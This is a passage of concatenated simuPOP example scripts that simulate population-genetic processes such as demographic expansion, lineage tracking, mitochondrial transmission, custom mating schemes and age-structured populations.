simuOpt\nsimuOpt.setOptions(quiet=True, alleleType='long')\nimport simuPOP as sim\nimport sys, types, os, math\noptions = [\n    {'name': 'demo',\n     'default': 'instant',\n     'label': 'Population growth model',\n     'description': 'How does a sim.Population grow from N0 to N1.',\n     'type': ('chooseOneOf', ['instant', 'exponential']),\n    },\n    {'name': 'N0',\n     'default': 10000,\n     'label': 'Initial sim.population size',\n     'type': 'integer',\n     'description': '''Initial sim.population size. This size will be maintained\n                till the end of the burn-in stage''',\n     'validator': simuOpt.valueGT(0)\n    },\n    {'name': 'N1',\n     'default': 100000,\n     'label': 'Final sim.population size',\n     'type': 'integer',\n     'description': 'Ending sim.population size (after sim.population expansion)',\n     'validator': simuOpt.valueGT(0)\n    }, \n    {'name': 'G0',\n     'default': 500,\n     'label': 'Length of burn-in stage',\n     'type': 'integer',\n     'description': 'Number of generations of the burn-in stage.',\n     'validator': simuOpt.valueGT(0)\n    },\n    {'name': 'G1',\n     'default': 1000,\n     'label': 'Length of expansion stage',\n     'type': 'integer',\n     'description': 'Number of generations of the sim.population expansion stage',\n     'validator': simuOpt.valueGT(0)\n    },\n    {'name': 'spec',\n     'default': [0.9] + [0.02]*5,\n     'label': 'Initial allelic spectrum',\n     'type': 'numbers',\n     'description': '''Initial allelic spectrum, should be a list of allele\n            frequencies, for allele 0, 1, 2, ... 
respectively.''',\n     'validator': simuOpt.valueListOf(simuOpt.valueBetween(0, 1)),\n    },\n    {'name': 's',\n     'default': 0.01,\n     'label': 'Selection pressure',\n     'type': 'number',\n     'description': '''Selection coefficient for homozygotes (aa) genotype.\n            A recessive selection model is used so the fitness values of\n            genotypes AA, Aa and aa are 1, 1 and 1-s respectively.''',\n     'validator': simuOpt.valueGT(-1),\n    },\n    {'name': 'mu',\n     'default': 1e-4,\n     'label': 'Mutation rate',\n     'type': 'number',\n     'description': 'Mutation rate of a k-allele mutation model',\n     'validator': simuOpt.valueBetween(0, 1),\n    },\n    {'name': 'k',\n     'default': 200,\n     'label': 'Maximum allelic state',\n     'type': 'integer',\n     'description': 'Maximum allelic state for a k-allele mutation model',\n     'validator': simuOpt.valueGT(1),\n    },\n]\n\ndef demo_model(type, N0=1000, N1=100000, G0=500, G1=500):\n    '''Return a demographic function \n    type: 'instant' or 'exponential'\n    N0:   Initial sim.population size.\n    N1:   Ending sim.population size.\n    G0:   Length of burn-in stage.\n    G1:   Length of sim.population expansion stage.\n    '''\n    rate = (math.log(N1) - math.log(N0))/G1\n    def ins_expansion(gen):\n        if gen < G0:\n            return N0\n        else:\n            return N1\n    \n    def exp_expansion(gen):\n        if gen < G0:\n            return N0\n        else: \n            return int(N0 * math.exp((gen - G0) * rate))\n    \n    if type == 'instant':\n        return ins_expansion\n    elif type == 'exponential':\n        return exp_expansion\n\nclass ne(sim.PyOperator):\n    '''Define an operator that calculates effective number of\n    alleles at given loci. The result is saved in a population\n    variable ne.\n    '''\n    def __init__(self, loci, *args, **kwargs):\n        self.loci = loci\n        sim.PyOperator.__init__(self, func=self.calcNe, *args, **kwargs)\n    \n    def calcNe(self, pop):\n        sim.stat(pop, alleleFreq=self.loci)\n        ne = {}\n        for loc in self.loci:\n            freq = pop.dvars().alleleFreq[loc]\n            sumFreq = 1 - pop.dvars().alleleFreq[loc][0]\n            if sumFreq == 0:\n                ne[loc] = 0\n            else:\n                ne[loc] = 1. 
/ sum([(freq[x]/sumFreq)**2 for x in list(freq.keys()) if x != 0])\n        # save the result to the sim.Population.\n        pop.dvars().ne = ne\n        return True\n\ndef simuCDCV(model, N0, N1, G0, G1, spec, s, mu, k):\n    '''Evolve a sim.Population using given demographic model\n    and observe the evolution of its allelic spectrum.\n    model: type of demographic model.\n    N0, N1, G0, G1: parameters of demographic model.\n    spec: initial allelic spectrum, should be a list of allele\n        frequencies for each allele.\n    s: selection pressure.\n    mu: mutation rate.\n    k: maximum allele for the k-allele model\n    '''\n    demo_func = demo_model(model, N0, N1, G0, G1)\n    print(demo_func(0))\n    pop = sim.Population(size=demo_func(0), loci=1, infoFields='fitness')\n    pop.evolve(\n        initOps=[\n            sim.InitSex(),\n            sim.InitGenotype(freq=spec, loci=0)\n        ],\n        matingScheme=sim.RandomMating(subPopSize=demo_func),\n        postOps=[\n            sim.KAlleleMutator(rates=mu, k=k),\n            sim.MaSelector(loci=0, fitness=[1, 1, 1 - s], wildtype=0),\n            ne(loci=(0,), step=100),\n            sim.PyEval(r'\"%d: %.2f\\t%.2f\\n\" % (gen, 1 - alleleFreq[0][0], ne[0])',\n                step=100),\n        ],\n        gen = G0 + G1\n    )\n    return pop\n\nif __name__ == '__main__':\n    # get parameters\n    par = simuOpt.Params(options, __doc__)\n    if not par.getParam():\n        sys.exit(1)\n    \n    if sum(par.spec) != 1:\n        print('Initial allelic spectrum should add up to 1.')\n        sys.exit(1)\n    # save user input to a configuration file\n    par.saveConfig('simuCDCV.cfg')\n    #\n    simuCDCV(*par.asList())\n\n#begin_ignore\nimport os\nif os.path.isfile('log/simuCDCV.py'):\n    out = os.popen('python log/simuCDCV.py -h')\n    hlp = open('log/simuCDCV.hlp', 'w')\n    hlp.write(out.read())\n    hlp.close()\n\n#end_ignore\n#end_file\n\n\n#begin_file log/randomSeed.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\ndef simulate():\n    pop = sim.Population(1000, loci=10, infoFields='age')\n    pop.evolve(\n        initOps=[\n            sim.InitSex(),\n            sim.InitGenotype(freq=[0.5, 0.5]),\n            sim.InitInfo(lambda: random.randint(0, 10), infoFields='age')\n        ],\n        matingScheme=sim.RandomMating(),\n        finalOps=sim.Stat(alleleFreq=0),\n        gen=100\n    )\n    return pop.dvars().alleleFreq[0][0]\n\nseed = sim.getRNG().seed()\nrandom.seed(seed)\nprint('%.4f' % simulate())\n# will yield a different result\nprint('%.4f' % simulate())\nsim.setRNG(seed=seed)\nrandom.seed(seed)\n# will yield an identical result because the same seeds are used\nprint('%.4f' % simulate())\n#end_file\n\n\n#begin_file log/debug.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n# redirect system stderr\nimport sys\ndebugOutput = open('debug.txt', 'w')\nold_stderr = sys.stderr\nsys.stderr = debugOutput\n# start simulation\nsimu = sim.Simulator(sim.Population(100, loci=1), rep=5)\nsimu.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitGenotype(freq=[0.1, 0.9])\n    ],\n    matingScheme=sim.RandomMating(),\n    postOps=[\n        sim.Stat(alleleFreq=0),\n        sim.IfElse('alleleNum[0][0] == 0',\n            ifOps=[\n                # the is None part makes the function return True\n                sim.PyOperator(lambda : sim.turnOnDebug(\"DBG_MUTATOR\") is None),\n                sim.PointMutator(loci=0, allele=0, inds=0),\n            ],\n            elseOps=sim.PyOperator(lambda : sim.turnOffDebug(\"DBG_MUTATOR\") is None)),\n    ],\n    gen = 100\n)\n# restore standard error\nsys.stderr = 
old_stderr\ndebugOutput.close()\nprint(''.join(open('debug.txt').readlines()[:5]))\n#begin_ignore\nsim.turnOffDebug(\"DBG_MUTATOR\")\n#end_ignore\n#end_file\n\n\n#begin_file log/geneticContribution.py\nimport simuOpt\nsimuOpt.setOptions(alleleType='lineage', quiet=True)\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=[10]*4)\n\npop.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitGenotype(freq=[0.25]*4),\n        sim.InitLineage(range(1000), mode=sim.PER_INDIVIDUAL),\n    ],\n    matingScheme=sim.RandomMating(ops=sim.Recombinator(rates=0.001)),\n    gen = 100\n)\n# average number of 'contributors'\nnum_contributors = [len(set(ind.lineage())) for ind in pop.individuals()]\nprint('Average number of contributors is %.2f' % (sum(num_contributors) / float(pop.popSize())))\n# percent of genetic information from each ancestor (baseline is 1/1000)\nlineage = pop.lineage()\nlin_perc = [lineage.count(x)/float(len(lineage)) for x in range(1000)]\n# how many ancestors do not have any alleles left?\nprint('Number of ancestors with no allele left: %d' % lin_perc.count(0.))\n# top three contributors\nlin_perc.sort()\nlin_perc.reverse()\nprint('Top contributors (started with 0.001): %.5f %.5f %.5f' % (lin_perc[0], lin_perc[1], lin_perc[2]))\n#end_file\n\n\n#begin_file log/ageOfMutants.py\nimport simuOpt\nsimuOpt.setOptions(alleleType='lineage', quiet=True)\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=10000, loci=[10]*10, infoFields='ind_id')\n# just to make sure IDs start from 1\nsim.IdTagger().reset(1)\npop.evolve(\n    initOps = [\n        sim.InitSex(),\n        sim.InitGenotype(freq=[0.2, 0.3, 0.4, 0.1]),\n        sim.IdTagger(),\n        sim.InitLineage(mode=sim.FROM_INFO),\n    ],\n    # an extremely high mutation rate, just for demonstration\n    preOps = sim.AcgtMutator(rate=0.01, model='JC69'),\n    matingScheme=sim.RandomMating(\n        ops=[\n            sim.IdTagger(),\n            sim.MendelianGenoTransmitter(),\n        ]\n    ),\n    gen = 10\n)\nlin = pop.lineage()\n# Number of alleles from each generation\nfor gen in range(10):\n    id_start = gen*10000 + 1\n    id_end = (gen+1)*10000\n    num_mut = len([x for x in lin if x >= id_start and x <= id_end])\n    print('Gen %d: %5.2f %%' % (gen, num_mut / (2*10000*100.) 
* 100))\n\n#end_file\n\n\n\n\n#begin_file log/mitochondrial.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=[5]*4,\n    # one autosome, two sex chromosomes, and one mitochondrial chromosome\n    chromTypes=[sim.AUTOSOME, sim.CHROMOSOME_X, sim.CHROMOSOME_Y, sim.MITOCHONDRIAL],\n    infoFields=['fitness'])\npop.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitGenotype(freq=[0.25]*4)\n    ],\n    preOps=[\n        sim.MapSelector(loci=17, fitness={(0,): 1, (1,): 1, (2,): 1, (3,): 0.4})\n    ],\n    matingScheme=sim.RandomMating(ops= [\n        sim.Recombinator(rates=0.1),\n        sim.MitochondrialGenoTransmitter(),\n    ]),\n    postOps=[\n        sim.Stat(alleleFreq=17, step=10),\n        sim.PyEval(r'\"%.2f %.2f %.2f %.2f\\n\" % (alleleNum[17][0],'\n            'alleleNum[17][1], alleleNum[17][2], alleleNum[17][3])', step=10),\n    ],\n    gen = 100\n)\n#end_file\n\n#begin_file log/mtDNA_evolve.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\ndef alleleCount(pop):\n    summary = [0]* 6\n    for ind in pop.individuals():\n        geno = ind.genotype(ploidy=0)\n        summary[geno[0] + geno[2] + geno[4] + geno[6] + geno[8]] += 1\n    print('%d %s' % (pop.dvars().gen, summary))\n    return True\n\npop = sim.Population(1000, loci=[2]*5, chromTypes=[sim.CUSTOMIZED]*5)\npop.evolve(\n    # everyone starts with mtDNA 10, 00, 00, 00, 00\n    initOps=[\n        sim.InitGenotype(haplotypes=[[1]+[0]*9]),\n    ],\n    # randomly select cells for cytoplasmic segregation\n    matingScheme=sim.RandomSelection(ops= [\n        sim.MitochondrialGenoTransmitter(),\n    ]),\n    postOps=sim.PyOperator(func=alleleCount, step=10),\n    gen = 51\n)\n#end_file\n\n#begin_file log/importData.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef importData(filename):\n    'Read data from ``filename`` and create a population'\n    data = open(filename)\n    header = data.readline()\n    fields = header.split(',')\n    # columns 1, 3, 5, ..., without trailing '_1'\n    names = [fields[x].strip()[:-2] for x in range(1, len(fields), 2)]\n    popSize = 0\n    alleleNames = set()\n    for line in data.readlines():\n        # get all allele names\n        alleleNames |= set([x.strip() for x in line.split(',')[1:]])\n        popSize += 1\n    # create a population\n    alleleNames = list(alleleNames)\n    pop = sim.Population(size=popSize, loci=len(names), lociNames=names,\n        alleleNames=alleleNames)\n    # start from the beginning of the file again\n    data.seek(0)\n    # discard the first line\n    data.readline()\n    for ind, line in zip(pop.individuals(), data.readlines()):\n        fields = [x.strip() for x in line.split(',')]\n        sex = sim.MALE if fields[0] == '1' else sim.FEMALE\n        ploidy0 = [alleleNames.index(fields[x]) for x in range(1, len(fields), 2)]\n        ploidy1 = [alleleNames.index(fields[x]) for x in range(2, len(fields), 2)]\n        ind.setGenotype(ploidy0, 0)\n        ind.setGenotype(ploidy1, 1)\n        ind.setSex(sex)\n    # close the file\n    data.close()\n    return pop\n\nfrom simuPOP.utils import saveCSV\npop = sim.Population(size=[10], loci=[3, 2], lociNames=['rs1', 'rs2', 'rs3', 'rs4', 'rs5'],\n    alleleNames=['A', 'B'])\nsim.initSex(pop)\nsim.initGenotype(pop, freq=[0.5, 0.5])\n# output sex but not affection status.\nsaveCSV(pop, filename='sample.csv', affectionFormatter=None,\n    sexFormatter={sim.MALE:1, sim.FEMALE:2})\n# have a look at the file\nprint(open('sample.csv').read())\npop1 = 
importData('sample.csv')\nsim.dump(pop1)\n#end_file\n\n\n#begin_file log/newOperator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nclass dynaMutator(sim.PyOperator):\n    '''This mutator mutates common loci with low mutation rate and rare\n    loci with high mutation rate, as an attempt to raise allele frequency\n    of rare loci to a higher level.'''\n    def __init__(self, cutoff, mu1, mu2, *args, **kwargs):\n        self.cutoff = cutoff\n        self.mu1 = mu1\n        self.mu2 = mu2\n        sim.PyOperator.__init__(self, func=self.mutate, *args, **kwargs)\n    #\n    def mutate(self, pop):\n        sim.stat(pop, alleleFreq=range(pop.totNumLoci()))\n        for i in range(pop.totNumLoci()):\n            # Get the frequency of allele 1 (disease allele)\n            if pop.dvars().alleleFreq[i][1] < self.cutoff:\n                sim.kAlleleMutate(pop, k=2, rates=self.mu1, loci=[i])\n            else:\n                sim.kAlleleMutate(pop, k=2, rates=self.mu2, loci=[i])\n        return True\n\npop = sim.Population(size=10000, loci=[2, 3])\npop.evolve(\n    initOps=[ \n        sim.InitSex(),\n        sim.InitGenotype(freq=[.99, .01], loci=[0, 2, 4]),\n        sim.InitGenotype(freq=[.8, .2], loci=[1, 3])\n    ],\n    preOps=dynaMutator(cutoff=.2, mu1=1e-2, mu2=1e-5),\n    matingScheme=sim.RandomMating(),\n    postOps=[\n        sim.Stat(alleleFreq=range(5), step=10),\n        sim.PyEval(r\"' '.join(['%.2f' % alleleFreq[x][1] for x in range(5)]) + '\\n'\",\n            step=10),\n    ],\n    gen = 31\n)          \n#end_file\n\n#begin_file log/RandomMating.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nfrom simuPOP import *\n#begin_ignore\nsetRNG(seed=12345)\n#end_ignore\ndef RandomMating(numOffspring=1., sexMode=RANDOM_SEX,\n        ops=MendelianGenoTransmitter(), subPopSize=[],\n        subPops=ALL_AVAIL, weight=0, selectionField='fitness'):\n    'A basic diploid sexual random mating scheme.'\n    return HomoMating(\n        chooser=RandomParentsChooser(True, selectionField),\n        generator=OffspringGenerator(ops, numOffspring, sexMode),\n        subPopSize=subPopSize,\n        subPops=subPops,\n        weight=weight)\n\n#end_file\n\n#begin_file log/sequentialSelfing.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=5*3, infoFields='parent_idx')\npop.evolve(\n    initOps=[sim.InitGenotype(freq=[0.2]*5)],\n    preOps=sim.Dumper(structure=False, max=5),\n    matingScheme=sim.HomoMating(\n        sim.SequentialParentChooser(),\n        sim.OffspringGenerator(ops=[\n            sim.SelfingGenoTransmitter(),\n            sim.ParentsTagger(infoFields='parent_idx'),\n        ])\n    ),\n    postOps=sim.Dumper(structure=False, max=5),\n    gen = 1\n)\n#end_file\n\n#begin_file log/controlledOffGenerator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef traj(gen):\n    return [0.5 + gen * 0.01]\n\npop = sim.Population(1000, loci=[10]*2)\n# evolve the sim.Population while keeping allele frequency 0.5\npop.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitGenotype(freq=[0.5, 0.5])\n    ],\n    matingScheme=sim.HomoMating(sim.RandomParentChooser(),\n        sim.ControlledOffspringGenerator(loci=5,\n            alleles=[0], freqFunc=traj,\n            ops = sim.SelfingGenoTransmitter())),\n    postOps=[\n        sim.Stat(alleleFreq=[5, 15]),\n        sim.PyEval(r'\"%.2f\\t%.2f\\n\" % (alleleFreq[5][0], alleleFreq[15][0])')\n    ],\n    gen = 5\n)\n#end_file\n\n#begin_file log/sexSpecificRec.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nfrom simuPOP import 
*\n#begin_ignore\nsetRNG(seed=12345)\n#end_ignore\nclass sexSpecificRecombinator(PyOperator):\n def __init__(self, intensity=0, rates=0, loci=[], convMode=NO_CONVERSION,\n maleIntensity=0, maleRates=0, maleLoci=[], maleConvMode=NO_CONVERSION,\n *args, **kwargs):\n # This operator is used to recombine maternal chromosomes\n self.Recombinator = Recombinator(rates, intensity, loci, convMode)\n # This operator is used to recombine paternal chromosomes\n self.maleRecombinator = Recombinator(maleRates, maleIntensity,\n maleLoci, maleConvMode)\n #\n PyOperator.__init__(self, func=self.transmitGenotype, *args, **kwargs)\n #\n def transmitGenotype(self, pop, off, dad, mom):\n # Form the first homologous copy of offspring.\n self.Recombinator.transmitGenotype(mom, off, 0)\n # Form the second homologous copy of offspring.\n self.maleRecombinator.transmitGenotype(dad, off, 1)\n return True\n\npop = Population(10, loci=[15]*2, infoFields=['father_idx', 'mother_idx'])\npop.evolve(\n initOps=[\n InitSex(),\n InitGenotype(freq=[0.4] + [0.2]*3)\n ],\n matingScheme=RandomMating(ops=[\n sexSpecificRecombinator(rates=0.1, maleRates=0),\n ParentsTagger()\n ]),\n postOps=Dumper(structure=False),\n gen = 2\n)\n#end_file\n\n\n#begin_file log/generator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef func():\n i = 1\n all = 0\n while i <= 5:\n all += 1./i\n i += 1\n yield all \n\nfor i in func():\n print('%.3f' % i)\n\n#end_file\n\n#begin_file log/PyParentsChooser.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom random import randint\ndef randomChooser(pop, subPop):\n males = []\n females = []\n # identify males and females in each social rank\n for rank in range(3):\n males.append([x for x in pop.individuals(subPop) \\\n if x.sex() == sim.MALE and x.rank == rank])\n females.append([x for x in pop.individuals(subPop) \\\n if x.sex() == sim.FEMALE and x.rank == rank])\n #\n while True:\n # choose a rank randomly\n rank = int(pop.individual(randint(0, pop.subPopSize(subPop) - 1), subPop).rank)\n yield males[rank][randint(0, len(males[rank]) - 1)], \\\n females[rank][randint(0, len(females[rank]) - 1)]\n\ndef setRank(rank):\n 'The rank of offspring can increase or drop to zero randomly'\n # only use rank of the father\n return (rank[0] + randint(-1, 1)) % 3\n\npop = sim.Population(size=[1000, 2000], loci=1, infoFields='rank')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitInfo(lambda : randint(0, 2), infoFields='rank')\n ],\n matingScheme=sim.HomoMating(\n sim.PyParentsChooser(randomChooser),\n sim.OffspringGenerator(ops=[\n sim.MendelianGenoTransmitter(),\n sim.PyTagger(setRank),\n ])\n ),\n gen = 5\n) \n#end_file\n\n\n#begin_file log/BuiltInParentsChooser.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom random import randint\n\ndef randomChooser(pop, subPop):\n maleChooser = sim.RandomParentChooser(sexChoice=sim.MALE_ONLY)\n maleChooser.initialize(pop, subPop)\n females = []\n # identify females in each social rank\n for rank in range(3):\n females.append([x for x in pop.individuals(subPop) \\\n if x.sex() == sim.FEMALE and x.rank == rank])\n #\n while True:\n # choose a random male\n m = maleChooser.chooseParents()[0]\n rank = int(m.rank)\n # find a female in the same rank\n yield m, 
females[rank][randint(0, len(females[rank]) - 1)]\n\ndef setRank(rank):\n    'The rank of offspring can increase or drop to zero randomly'\n    # only use rank of the father\n    return (rank[0] + randint(-1, 1)) % 3\n\npop = sim.Population(size=[1000, 2000], loci=1, infoFields='rank')\npop.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitInfo(lambda : randint(0, 2), infoFields='rank')\n    ],\n    matingScheme=sim.HomoMating(\n        sim.PyParentsChooser(randomChooser),\n        sim.OffspringGenerator(ops=[\n            sim.MendelianGenoTransmitter(),\n            sim.PyTagger(setRank),\n        ])\n    ),\n    gen = 5\n)    \n#end_file\n\n\n\n#begin_file log/cppParentChooser.py\n#expect_error because some systems do not have swig or vc to compile\n#begin_ignore\nclassFile = open('log/myParentsChooser.h', 'w')\nclassFile.write('''#include <stdlib.h>\n#include <time.h>\n#include <vector>\n#include <utility>\nusing std::pair;\nusing std::vector;\nclass myParentsChooser\n{\npublic:\n    // A constructor takes all locations of males and females.\n    myParentsChooser(const std::vector<unsigned long> & m, const std::vector<unsigned long> & f)\n        : male_idx(m), female_idx(f)\n    {\n        srand(time(0));\n    }\n\n    pair<unsigned long, unsigned long> chooseParents()\n    {\n        unsigned long male = rand() % male_idx.size();\n        unsigned long female = rand() % female_idx.size();\n        return std::make_pair(male, female);\n    }\nprivate:\n    vector<unsigned long> male_idx;\n    vector<unsigned long> female_idx;\n};\n''')\nclassFile.close()\ninterFile = open('log/myParentsChooser.i', 'w')\ninterFile.write('''%module myParentsChooser\n%{\n#include \"myParentsChooser.h\"\n%}\n// std_vector.i for std::vector\n%include \"std_vector.i\"\n%template() std::vector<unsigned long>;\n// stl.i for std::pair\n%include \"stl.i\"\n%template() std::pair<unsigned long, unsigned long>;\n%include \"myParentsChooser.h\"\n''')\ninterFile.close()\nsetupFile = open('log/setup.py', 'w')\nsetupFile.write('''from distutils.core import setup, Extension\nimport sys\n# Under linux/gcc, lib stdc++ is needed for C++ based extension.\nif sys.platform == 'linux2':\n    libs = ['stdc++']\nelse:\n    libs = []\nsetup(name = \"myParentsChooser\",\n    description = \"A sample parent chooser\",\n    py_modules = ['myParentsChooser'],  # will be generated by SWIG\n    ext_modules = [\n        Extension('_myParentsChooser',\n            sources = ['myParentsChooser.i'],\n            swig_opts = ['-O', '-shadow', '-c++', '-keyword',],\n            include_dirs = [\".\"],\n    )\n  ]\n)\n''')\nsetupFile.close()\nimport os, sys\nsys.path.append('log')\ntry:\n    import myParentsChooser\nexcept ImportError:\n    os.chdir('log')\n    os.system('python setup.py build_ext --swig-opts=\"-O -templatereduce -shadow -c++ -keyword -nodefaultctor\" install --install-purelib=\".\" --install-platlib=\".\"')\n    os.chdir('..')\n#end_ignore\n\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\n# The class myParentsChooser is defined in module myParentsChooser\ntry:\n    from myParentsChooser import myParentsChooser\nexcept ImportError:\n    # if failed to import the C++ version, use a Python version\n    import random\n    class myParentsChooser:\n        def __init__(self, maleIndexes, femaleIndexes):\n            self.maleIndexes = maleIndexes\n            self.femaleIndexes = femaleIndexes\n        def chooseParents(self):\n            return self.maleIndexes[random.randint(0, len(self.maleIndexes)-1)],\\\n                self.femaleIndexes[random.randint(0, len(self.femaleIndexes)-1)]\n\ndef parentsChooser(pop, sp):\n    'How to call a C++ level parents chooser.'\n    # create an object with needed information (such as x, y) ...\n    pc = myParentsChooser(\n        [x for x in range(pop.popSize()) if pop.individual(x).sex() == sim.MALE],\n        [x for x in range(pop.popSize()) if pop.individual(x).sex() == 
sim.FEMALE])\n    while True:\n        # return indexes of parents repeatedly\n        yield pc.chooseParents()\n\npop = sim.Population(100, loci=1)\npop.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitGenotype(freq=[0.5, 0.5])\n    ],\n    matingScheme=sim.HomoMating(sim.PyParentsChooser(parentsChooser),\n        sim.OffspringGenerator(ops=sim.MendelianGenoTransmitter())),\n    gen = 100\n)\n#end_file\n\n\n\n#begin_file log/ageStructured.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\nN = 10000\npop = sim.Population(N, loci=1, infoFields=['age', 'ind_id', 'father_id', 'mother_id'])\npop.setVirtualSplitter(sim.InfoSplitter(field='age', cutoff=[20, 50, 75]))\ndef demoModel(gen, pop):\n    '''A demographic model that keeps a constant supply of new individuals'''\n    # number of individuals that will die\n    sim.stat(pop, popSize=True, subPops=[(0,3)])\n    # individuals that will be kept, plus some new guys.\n    return pop.popSize() - pop.dvars().popSize + N // 75\n\ndef pene(geno, age, ind):\n    'Define an age-dependent penetrance function'\n    # this disease does not occur in children\n    if age < 16:\n        return 0\n    # if an individual is already affected, keep it so\n    if ind.affected():\n        return 1\n    # the probability of getting disease increases with age\n    return (0., 0.001*age, 0.001*age)[sum(geno)]\n\ndef outputstat(pop):\n    'Calculate and output statistics'\n    sim.stat(pop, popSize=True, numOfAffected=True,\n        subPops=[(0, sim.ALL_AVAIL)],\n        vars=['popSize_sp', 'propOfAffected_sp'])\n    for sp in range(3):\n        print('%s: %.3f%% (size %d)' % (pop.subPopName((0,sp)),\n            pop.dvars((0,sp)).propOfAffected * 100.,\n            pop.dvars((0,sp)).popSize))\n    #\n    return True\n\n\npop.evolve(\n    initOps=[\n        sim.InitSex(),\n        # randomly assign age\n        sim.InitInfo(lambda: random.randint(0, 75), infoFields='age'),\n        # random genotype\n        sim.InitGenotype(freq=[0.5, 0.5]),\n        # assign a unique ID to everyone.\n        sim.IdTagger(),\n        sim.PyOutput('Prevalence of disease in each age group:\\n'),\n    ],\n    # increase the age of everyone by 1 before mating.\n    preOps=sim.InfoExec('age += 1'),\n    matingScheme=sim.HeteroMating([\n        # all individuals with age < 75 will be kept. Note that\n        # CloneMating will keep individual sex, affection status and all\n        # information fields (by default).\n        sim.CloneMating(subPops=[(0,0), (0,1), (0,2)], weight=-1),\n        # only individuals with age between 20 and 50 will mate and produce\n        # offspring. 
The age of offspring will be zero.\n sim.RandomMating(ops=[\n sim.IdTagger(), # give new born an ID\n sim.PedigreeTagger(), # track parents of each individual\n sim.MendelianGenoTransmitter(), # transmit genotype\n ],\n numOffspring=(sim.UNIFORM_DISTRIBUTION, 1, 3),\n subPops=[(0,1)]),],\n subPopSize=demoModel),\n # number of individuals?\n postOps=[\n sim.PyPenetrance(func=pene, loci=0),\n sim.PyOperator(func=outputstat, step=20)\n ],\n gen = 200\n)\n\n# draw two Pedigrees from the last age-structured population\nfrom simuPOP import sampling\nsample = sampling.drawNuclearFamilySample(pop, families=2, numOffspring=(2,3),\n affectedParents=(1,2), affectedOffspring=(1,3))\nsim.dump(sample)\n\n#end_file\n\n\n#begin_file log/pedigreeMating.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n# create a population without any genotype\nfrom simuPOP.utils import migrSteppingStoneRates\nped = sim.Population(size=[1000]*5, ancGen=-1, \n infoFields=['ind_id', 'father_id', 'mother_id', 'migrate_to'])\nped.evolve(\n initOps=[\n sim.InitSex(),\n sim.IdTagger(),\n ],\n preOps=sim.Migrator(rate=migrSteppingStoneRates(0.1, 5)),\n matingScheme=sim.RandomMating(\n numOffspring=(sim.UNIFORM_DISTRIBUTION, 2, 4),\n ops=[\n # we do not even need a genotype transmitter...\n sim.IdTagger(),\n sim.PedigreeTagger(),\n ]),\n gen=100\n)\n# convert itself to a pedigree object\nped.asPedigree()\n# we should have 100 ancestral generations\nN = ped.ancestralGens()\n# We should have 101 * 1000 * 5 individuals, but how many actually\n# contribute genotype to the last generation?\nanc = ped.identifyAncestors()\nlen(anc)\n# remove individuals who do not contribute genotype to the last generation\nallIDs = [x.ind_id for x in ped.allIndividuals()]\nremovedIDs = list(set(allIDs) - set(anc))\nped.removeIndividuals(IDs=removedIDs)\n# now create a top most population, but we do not need all of them\n# so we record only used individuals\nIDs = [x.ind_id for x in ped.allIndividuals(ancGens=N)]\nsex = [x.sex() for x in ped.allIndividuals(ancGens=N)]\n# create a population, this time with genotype. 
